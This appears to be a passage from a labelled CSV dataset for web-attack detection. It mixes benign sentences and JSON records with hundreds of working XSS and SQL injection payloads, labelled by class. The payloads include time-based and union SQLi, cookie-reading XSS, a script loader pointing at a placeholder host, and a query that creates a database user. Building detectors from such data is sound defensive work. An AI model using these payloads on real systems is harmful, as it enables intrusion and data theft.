end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,10436 "<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>",1,XSS,5077 "1"" where 1982 = 1982",2,SQLi,21809 <SCRIPT SRC=//xss.rocks/.j>,1,XSS,9644 The type of trust you select as a beneficiary matters.,3,normal,25367 Up to 40% off select DeWalt Power Tools and Accessories,3,normal,25216 "Fortnite servers are really bad today/tonight. Been having lots of duo/squad load issues, and matchmaking issues...I haven’t seen anything posted from Epic or Fortnite but if you have problems with it loading, try going to select game mode and try again!",3,normal,26504 "<table onkeypress=""alert(1)"" contenteditable>test</table>",1,XSS,4090 "1' ) where 5276 = 5276 union all select null,null--",2,SQLi,18375 waitfor delay '00:00:05',2,SQLi,21172 "rock mag select, which they did not.",3,normal,25747 "1"" where 9332 = 9332 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,14973 "<track onkeydown=""alert(1)"" contenteditable>test</track>",1,XSS,4251 Where's your SQL codebase?,3,normal,23425 "1%' ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,16831 "After Republicans won control of the House in the 2010 midterm elections, GOP leaders thwarted her attempt to gain a leadership position as House Republican Conference chair, though Speaker John Boehner did select her to the House Permanent select Committee on Intelligence.",3,normal,26405 "1"" ) as jrse where 9185 = 9185 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10120 "{""id"":null,""firstName"":""Alexiskandar"",""lastName"":""Ryn"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26953 1%' ) order by 1--,2,SQLi,22041 "1' ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12133 <var id=x tabindex=1 onactivate=alert(1)></var>,1,XSS,6144 "<i onbeforecut=""alert(1)"" contenteditable>test</i>",1,XSS,5663 select ( case when ( 9376 = 4521 ) then 1 else 9376* ( select 9376 from master..sysdatabases ) end ) --,2,SQLi,13994 "1 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) # qmkh",2,SQLi,15061 "<hr onmouseout=""alert(1)"">test</hr>",1,XSS,9034 1%' ) ) ) or sleep ( 5 ) #,2,SQLi,21010 "<DIV STYLE=""background-image: url(javascript:javascript:alert(1))"">",1,XSS,2661 "javascript:alert()//*-->*`/*'/*""/*\""/*</title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>/*<svg onload=alert()>*/ alert()//</script>",1,XSS,143 "<iframe src=""""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>",1,XSS,2599 "<content ondblclick=""alert(1)"">test</content>",1,XSS,6704 "-4076' ) ) union all select 9030,9030,9030,9030,9030,9030,9030,9030,9030,9030--",2,SQLi,15247 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) ) ||',2,SQLi,17785 1'+ ( select myci where 8903 = 8903,2,SQLi,20082 "{""id"":null,""firstName"":""Brandon"",""lastName"":""Lee"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27482 Insert a USB drive.,3,normal,22788 "<samp oncontextmenu=""alert(1)"">test</samp>",1,XSS,7421 "-8065"" ) ) ) order by 1--",2,SQLi,21155 "-8106%"" ) union all select 2051,2051,2051,2051,2051,2051#",2,SQLi,17546 -4173' ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( 'jdwt' like 'jdwt,2,SQLi,10473 I need to decide where to go for a weekend trip.,3,normal,23800 "-6496"" ) ) ) or 1471 = 5278 and ( ( ( ""zkoj"" = ""zkoj",2,SQLi,18195 "1' ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( 'cdaq' like 'cdaq",2,SQLi,12154 Select locate.,3,normal,24601 -4323' ) ) or 6968 = 1393,2,SQLi,21060 Select a travel destination for an escape.,3,normal,23994 "-5145' where 2334 = 2334 union all select 2334,2334,2334,2334--",2,SQLi,16867 "or ""&",2,SQLi,22541 "select * from users where id = '1'<@.. union select 1,version ( ) -- 1'",2,SQLi,16037 "<xmp onmouseenter=""alert(1)"">test</xmp>",1,XSS,8182 "1"" ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( ""wile"" like ""wile",2,SQLi,11589 "1"" ) as kbjt where 2012 = 2012 and ( 5978 = 6898 ) *6898--",2,SQLi,17356 <script>alert('XSS');</script>,1,XSS,9531 "<A HREF=""http://0x42.0x0000066.0x7.0x93/""></A>",1,XSS,6372 "<nextid oncopy=""alert(1)"" contenteditable>test</nextid>",1,XSS,4630 I'm considering where to go for a weekend retreat.,3,normal,23784 "1"" ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ""ctrr"" = ""ctrr",2,SQLi,14502 ") or ""1""=""1",2,SQLi,22343 sleep(5)#,2,SQLi,22460 "<style>@keyframes slidein {}</style><rt style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></rt>",1,XSS,443 Update image.,3,normal,23085 alert&#x28;1&#x29,1,XSS,9797 "<li ondblclick=""alert(1)"">test</li>",1,XSS,9049 "<acronym draggable=""true"" ondrag=""alert(1)"">test</acronym>",1,XSS,3832 "{""id"":7493,""name"":""for jmeter test to work <DO NOT DELETE>""}",3,normal,26808 Insert your contact details.,3,normal,22570 "His advisers were men like the famous jurist Ulpian, the historian Dio Cassius and a select board of sixteen senators; a municipal council of fourteen assisted the city praefect in administering the affairs of the fourteen districts of Rome.",3,normal,26104 <head id=x tabindex=1 onfocus=alert(1)></head>,1,XSS,6346 Select your discover.,3,normal,24991 <basefont id=x tabindex=1 ondeactivate=alert(1)></basefont><input id=y autofocus>,1,XSS,1960 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><progress id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></progress>",1,XSS,157 1 where 5359 = 5359 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,10511 "They can either take the shot themselves, or select someone else.",3,normal,25319 "<xmp draggable=""true"" ondragleave=""alert(1)"">test</xmp>",1,XSS,4580 "<div draggable=""true"" contenteditable>drag me</div><area ondragover=alert(1) contenteditable>drop here</area>",1,XSS,1091 sleep 50',2,SQLi,22469 "1' where 8083 = 8083 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) --",2,SQLi,12600 <dt onpointerover=alert(1)>XSS</dt>,1,XSS,9125 "<font onmouseover=""alert(1)"">test</font>",1,XSS,7953 "1"" ) as vpna where 5450 = 5450 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11125 "1 where 8045 = 8045 union all select null,null,null--",2,SQLi,18082 intersect,3,normal,23189 "Y., Senate Select Committee on Intelligence Chairman Richard Burr, R-N.",3,normal,25112 <marquee onpointerleave=alert(1)>XSS</marquee>,1,XSS,6418 "-4984%"" ) ) ) union all select 6980,6980,6980,6980,6980,6980,6980,6980#",2,SQLi,16045 "<!--#exec cmd=""/bin/echo '<SCR'""-->",1,XSS,9090 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 2 ) ) AND 'i' = 'i",2,SQLi,11463 1'|| ( select 'adni' from dual where 6611 = 6611,2,SQLi,18734 <element onpointerup=alert(1)>XSS</element>,1,XSS,7099 "<div draggable=""true"" contenteditable>drag me</div><object ondrop=alert(1) contenteditable>drop here</object>",1,XSS,1100 "<rb onkeypress=""alert(1)"" contenteditable>test</rb>",1,XSS,5435 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ""sfnj"" like ""sfnj",2,SQLi,13254 <section onpointerleave=alert(1)>XSS</section>,1,XSS,6452 -5830' ) as fivy where 2173 = 2173 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,12352 "1' ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) )",2,SQLi,10809 "-3781%' ) union all select 7497,7497,7497,7497,7497--",2,SQLi,18123 """ or benchmark(10000000,MD5(1))#",2,SQLi,20239 Insert your personal details.,3,normal,22725 "<applet draggable=""true"" ondragleave=""alert(1)"">test</applet>",1,XSS,3350 "<area onbeforecopy=""alert(1)"" contenteditable>test</area>",1,XSS,4081 foo\'; alert(document.cookie);//';,1,XSS,9180 @BlizzardCS I’ve struggled trying to get into @PlayHearthstone on iOS and iTunes keeps taking up to the App Store to update even though I’ve selected the latest update-Both on iPad and iPhone. Can you help?,3,normal,26515 "<style>:target {transform: rotate(180deg);}</style><strong id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></strong>",1,XSS,589 <u onpointerover=alert(1)>XSS</u>,1,XSS,9349 "create table myfile (line varchar(8000))"" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp�'"" select * from myfile""--",2,SQLi,13293 "1 ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,13561 Select your dream wedding transportation.,3,normal,24386 "1"" ) where 2312 = 2312 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10988 "{""id"":null,""name"":""Noctowl""}",3,normal,26979 "1 and ascii ( lower ( substring ( ( select top 1 name from sysobjects where xtype = 'u' ) , 1, 1 ) ) ) > 116",2,SQLi,13699 "-9136' ) or make_set ( 9354 = 9354,7185 )",2,SQLi,19398 1 ) ) ) order by 1#,2,SQLi,21984 "Please, select wisely.",3,normal,24422 1 where 2239 = 2239 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --,2,SQLi,16323 "<style>:target {transform: rotate(180deg);}</style><head id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></head>",1,XSS,647 "1 ) where 5048 = 5048 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11773 <svg id=x onfocusin=alert(1)>,1,XSS,9590 "-3130 ) union all select 1741,1741,1741,1741,1741,1741,1741,1741#",2,SQLi,16672 "-2852%' ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11763 "-3007 ) where 6648 = 6648 union all select 6648,6648,6648,6648,6648,6648,6648,6648#",2,SQLi,15060 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><abbr id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></abbr>",1,XSS,228 sign,3,normal,23214 <rp onblur=alert(1) tabindex=1 id=x></rp><input autofocus>,1,XSS,3866 1' where 2389 = 2389 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10616 Where's the missing key?,3,normal,22700 "Shoppers can either choose the items they want placed in the basket, or select a specified basket theme that features correlated items.",3,normal,25558 "{""id"":null,""firstName"":""Leon"",""lastName"":""Chia"",""address"":""143 Bradell Road"",""city"":""776"",""telephone"":""2581657207""}",3,normal,27358 "1"" ) ) as daqd where 4390 = 4390 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,16178 1'+ ( select ntym where 4750 = 4750,2,SQLi,20119 <mark onpointerout=alert(1)>XSS</mark>,1,XSS,8441 "<style>@keyframes x{}</style><label style=""animation-name:x"" onanimationstart=""alert(1)""></label>",1,XSS,1531 Select your job.,3,normal,24859 "<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>",1,XSS,925 Select your dream project.,3,normal,24341 I'm thinking of where to go for a photography session.,3,normal,23755 -8636' ) ) ) or 4301 = 7212--,2,SQLi,20775 "-8773%' ) ) ) union all select 8941,8941,8941,8941,8941,8941#",2,SQLi,17077 "UNION SELECT @@VERSION,SLEEP(5),""'3",2,SQLi,20012 "1"" ) and 9198 = 9198--",2,SQLi,21523 "1' ) ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 'fzgy' = 'fzgy",2,SQLi,10126 ( 8362 = 9139 ) *9139,2,SQLi,21663 <animate onpointerup=alert(1)>XSS</animate>,1,XSS,7186 "1"" ) ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( ""ytju"" like ""ytju",2,SQLi,12174 Just select the layer you want to change the opacity on.,3,normal,25930 <tt id=x tabindex=1 ondeactivate=alert(1)></tt><input id=y autofocus>,1,XSS,2593 <time id=x tabindex=1 onfocusin=alert(1)></time>,1,XSS,5908 Sort the playing cards before the game.,3,normal,22935 "1' ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,11229 "<keygen onmouseout=""alert(1)"">test</keygen>",1,XSS,7136 <cite id=x tabindex=1 ondeactivate=alert(1)></cite><input id=y autofocus>,1,XSS,2309 1'+ ( select wpbj where 1849 = 1849,2,SQLi,20098 "1%"" ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17095 "-6412 ) ) as cnfs where 6557 = 6557 union all select 6557,6557,6557,6557,6557,6557,6557,6557,6557#",2,SQLi,14227 "<style>:target {transform: rotate(180deg);}</style><thead id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></thead>",1,XSS,614 Where's the circus?,3,normal,23593 -2505' or 9323 = 9323#,2,SQLi,21525 "-3860' union all select 3510,3510,3510#",2,SQLi,19608 "1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'pbqg' = 'pbqg",2,SQLi,11192 "<center onmouseenter=""alert(1)"">test</center>",1,XSS,6632 <blink id=x tabindex=1 onbeforeactivate=alert(1)></blink>,1,XSS,4137 "<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//[""'`-->]]>]</div>",1,XSS,1900 select ( case when ( 4755 = 4784 ) then 1 else 4755* ( select 4755 from master..sysdatabases ) end ) --,2,SQLi,13961 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rb id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></rb>",1,XSS,284 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><var id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></var>",1,XSS,260 "1"" ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""egxe"" = ""egxe",2,SQLi,11140 "{""id"":null,""firstName"":""Boon"",""lastName"":""Lee"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26851 <strong id=x tabindex=1 onactivate=alert(1)></strong>,1,XSS,4945 -7378' or 6872 = 6872 and 'bnmn' like 'bnmn,2,SQLi,19230 "1' where 2391 = 2391 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,14745 "1' and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and 'zjxk' = 'zjxk",2,SQLi,11555 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9--",2,SQLi,19933 <bgsound onpointerout=alert(1)>XSS</bgsound>,1,XSS,6974 1' ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( 'pemj' = 'pemj,2,SQLi,14913 "1%' ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13545 <marquee id=x tabindex=1 onfocus=alert(1)></marquee>,1,XSS,5225 "<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('')</SCRIPT>"">",1,XSS,2287 or 0=0 #,2,SQLi,22483 <button onResizeEnd=javascript:alert(1)>,1,XSS,8081 1' ) ) ) and 3602 = 1990#,2,SQLi,21068 1' ) where 7252 = 7252,2,SQLi,21415 "<hgroup onmouseenter=""alert(1)"">test</hgroup>",1,XSS,6713 Please unban with and ignore all lame excuses of PTA.And most important thing is youth has selected people to PM.,3,normal,26486 "1'+ ( select nzij where 5456 = 5456 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) ) +'",2,SQLi,10427 -1257' ) order by 1#,2,SQLi,21831 "javascript:""/*\""/*'/*--></title></textarea></style></noscript></template></noembed></script><<script>/*` /*<frame src=javascript:/**/alert()//><</script>",1,XSS,477 "1"" ) where 3058 = 3058 union all select null--",2,SQLi,18963 "-7802' ) ) ) or elt ( 8778 = 9974,9974 ) and ( ( ( 'glsq' like 'glsq",2,SQLi,16415 "<em oncut=""alert(1)"" contenteditable>test</em>",1,XSS,6413 <rt id=x tabindex=1 onbeforedeactivate=alert(1)></rt><input autofocus>,1,XSS,2553 "<datalist onclick=""alert(1)"">test</datalist>",1,XSS,6855 <spacer id=x tabindex=1 onfocus=alert(1)></spacer>,1,XSS,5548 "1'|| ( select 'flre' where 8250 = 8250 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) ) ||'",2,SQLi,13513 "-8186%' or elt ( 1032 = 1032,3623 ) and '%' = '",2,SQLi,18834 savepoint,3,normal,23170 Select perform.,3,normal,24726 "{""id"":null,""name"":""Chatot""}",3,normal,27121 1' ) as gsjr where 7046 = 7046 and sleep ( 5 ) #,2,SQLi,18682 <rp onpointerout=alert(1)>XSS</rp>,1,XSS,9206 "-8651"" ) where 8391 = 8391 union all select 8391,8391#",2,SQLi,17985 I need to decide where to go for the weekend.,3,normal,23690 -9553 ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 5299 = 5299,2,SQLi,10207 -5116 ) or ( 8287 = 4930 ) *4930,2,SQLi,20378 select ( case when ( 9393 = 5530 ) then 9393 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13589 ORDER BY 2--,2,SQLi,22296 "1' ) ) as cgey where 2130 = 2130 and make_set ( 7914 = 4032,4032 ) --",2,SQLi,16304 Weekends: Streaming for select public libraries and universities through Kanopy.,3,normal,25173 -9336' or 5641 = 9488#,2,SQLi,21391 <input type=checkbox id=x onfocus=alert(1)>,1,XSS,7196 "1"" ) ) as sgln where 7573 = 7573",2,SQLi,20275 "-9507%"" union all select 3342,3342,3342,3342,3342#",2,SQLi,18513 "<title oncontextmenu=""alert(1)"">test</title>",1,XSS,6826 Let's discuss where to go for our next adventure.,3,normal,23974 Amazon slashed prices on select items at Whole Foods on Aug.,3,normal,26379 "<div draggable=""true"" contenteditable>drag me</div><fieldset ondragover=alert(1) contenteditable>drop here</fieldset>",1,XSS,783 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( '%' = '",2,SQLi,14963 declare @s varchar ( 200 ) select @s = 0x73656c6 ...,2,SQLi,18157 "1'+ ( select 'zkuf' where 3591 = 3591 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) +'",2,SQLi,11007 <svg><script>alert&NewLine;(1)</script></svg>,1,XSS,6522 "<bdi oncopy=""alert(1)"" contenteditable>test</bdi>",1,XSS,5776 "1%' ) ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13195 "<s onmouseover=""alert(1)"">test</s>",1,XSS,9286 "<p ondblclick=""alert(1)"">test</p>",1,XSS,9372 "Dim sum plates and tea are brought around by cart, and you select whatever appeals to you.",3,normal,26242 -8004%' ) or ( 2301 = 7504 ) *7504 and ( '%' = ',2,SQLi,18732 1' and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'napi' like 'napi,2,SQLi,10295 `'><script>\xE2\x80\x87javascript:alert(522)</script>,1,XSS,5057 "1"" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) )",2,SQLi,10824 If you have a voltmeter or DVM select the 200 volt range and connect it across the output.,3,normal,26052 "<style>@keyframes x{}</style><sub style=""animation-name:x"" onanimationend=""alert(1)""></sub>",1,XSS,1729 1 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) # lwfs,2,SQLi,17018 `) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337,2,SQLi,16033 "<svg onbeforecut=""alert(1)"" contenteditable>test</svg>",1,XSS,4668 -6722' ) order by 1#,2,SQLi,21828 <button onOffline=javascript:alert(1)>,1,XSS,8538 "<strong onkeypress=""alert(1)"" contenteditable>test</strong>",1,XSS,3752 "1 where 5929 = 5929 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12948 "1"" where 5406 = 5406 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12746 "1%"" or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11431 ";alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"";alert(String.fromCharCode(88,83,83))//"";alert(String.fromCharCode(88,83,83))//--></SCRIPT>"">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",1,XSS,99 Where's your SQL documentation?,3,normal,23411 "<IMG SRC=x oncuechange=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3139 "1' ) ) ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13392 "insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))",2,SQLi,14381 "select * from users where id = 1 or ""?["" or 1 = 1 -- 1",2,SQLi,17945 "1%' ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13164 "-7737'|| ( select 'xalo' where 9219 = 9219 union all select 9219,9219,9219,9219#",2,SQLi,15201 "<audio draggable=""true"" ondragenter=""alert(1)"">test</audio>",1,XSS,3650 "1' where 3125 = 3125 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,10873 "{""id"":null,""name"":""pile now""}",3,normal,27521 "select * from users where id = 1 or ""?_"" or 1 = 1 -- 1",2,SQLi,17925 &lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;,1,XSS,1635 "admin"" ) or ( ""1"" = ""1""--",2,SQLi,21038 1' ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( 'snoa' = 'snoa,2,SQLi,12488 "1"" ) ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( ""uzjn"" = ""uzjn",2,SQLi,11885 Delete the outdated messages from your chat.,3,normal,22992 "{""id"":null,""name"":""excited bare sang""}",3,normal,27269 -9355' or ( 8459 = 8459 ) *4906 and 'aegf' = 'aegf,2,SQLi,18498 Where's the forest?,3,normal,23523 "<marquee onmouseleave=""alert(1)"">test</marquee>",1,XSS,6173 <b id=x tabindex=1 onfocusin=alert(1)></b>,1,XSS,7524 &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;,1,XSS,574 ...,1,XSS,9882 "Having made himself proficient in practical bee-work and chosen a suitable location for his apiary, the bee-keeper should carefully select the particular type of hive most suited to his means and requirements.",3,normal,26132 1 ) ) or sleep ( 5 ) and ( ( 8285 = 8285,2,SQLi,19470 "<style>:target {transform: rotate(180deg);}</style><select id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></select>",1,XSS,599 1' where 5458 = 5458 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,15376 Find missing sock.,3,normal,23059 <p id=x tabindex=1 onfocusin=alert(1)></p>,1,XSS,7348 "<multicol onmouseup=""alert(1)"">test</multicol>",1,XSS,6306 "{""id"":null,""name"":""Starly""}",3,normal,26872 "1' in boolean mode ) union all select null,null,null,null,null,null#",2,SQLi,16400 Select this song.,3,normal,24805 and sleep 5,2,SQLi,22394 "1"" ) ) ) or sleep ( 5 ) and ( ( ( ""hdis"" like ""hdis",2,SQLi,18346 "</script><img/*%00/src=""worksinchrome&colon;prompt&#x28;1&#x29;""/%00*/onerror='eval(src)'>",1,XSS,1755 1'+ ( select xzse where 4530 = 4530,2,SQLi,20078 Select copy.,3,normal,24607 -2715' ) ) or 6942 = 1636 and ( ( 'mqeq' = 'mqeq,2,SQLi,18769 ))) waitfor delay '0:0:20' --,2,SQLi,20671 "<u draggable=""true"" ondragenter=""alert(1)"">test</u>",1,XSS,5434 Create a beautiful mural.,3,normal,22711 "1%' and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13207 Please select a wedding favor.,3,normal,24381 "{""id"":null,""firstName"":""Cassia"",""lastName"":""Seah"",""address"":""50 MCDOWELL 